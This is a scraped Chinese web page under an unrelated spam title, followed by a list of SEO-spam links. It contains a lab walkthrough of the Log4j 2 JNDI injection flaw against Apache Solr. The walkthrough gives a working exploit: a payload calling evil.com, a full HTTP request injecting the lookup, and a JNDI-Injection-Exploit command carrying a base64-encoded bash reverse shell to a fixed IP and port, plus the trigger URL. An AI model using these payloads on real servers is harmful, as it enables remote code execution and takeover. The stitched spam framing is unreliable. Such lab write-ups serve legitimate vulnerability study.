当前位置: 首页 > news >正文

私人让做彩票网站吗最新新闻摘抄

私人让做彩票网站吗,最新新闻摘抄,绚丽网站,怎么下学做衣服网站Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.shuangfujiaoyu.com/news/21954.html

相关文章:

  • 北京营销型网站建设培训培训教育
  • PPT做音乐网站介绍百度一下京东
  • 做网站最大可以做多少gseo工资水平
  • 网易网站开发语言小说推广关键词怎么弄
  • 如何查询自己的网站是否被收录百度贴吧官网入口
  • 四川网站排名《新闻联播》 今天
  • 佛山智能模板建站百度搜索流量查询
  • 新疆通汇建设集团有限公司网站百度电话客服24小时
  • 潍坊高端网站设计注册域名在哪里注册
  • 哪里有响应式网站企业网站软件下载
  • 莘县网站建设网络运营和网络营销的区别
  • wordpress安装插件失败网站排名seo教程
  • 自适应网站内容做多大尺寸seo建设者
  • 网站制作费用多少钱seo排名怎样
  • 做网站 卖产品上海优化网站方法
  • wordpress html音乐播放器湖南靠谱seo优化报价
  • wordpress cue插件下载宁波seo关键词
  • 上海快速建设网站公司搜索引擎优化
  • 移动网站的设计报告哪个合肥seo好
  • 在线查询网站开发语言广告公司注册
  • 网站seo心态网络整合营销策划书
  • 银川网站建设培训哪家好网址关键词查询
  • 做旅游网站怎么融资天津seo标准
  • 网站建设就选下载安装百度一下
  • 企业网站的建设哪家比较好推广app
  • 什么软件可以做企业网站自动推广工具
  • 建筑工程168网某一网站seo策划方案
  • WordPress博客整站带数据域名查询阿里云
  • 网站建设公司能力要求百度推广外包哪家不错
  • 自助网站免费网络营销的主要传播渠道是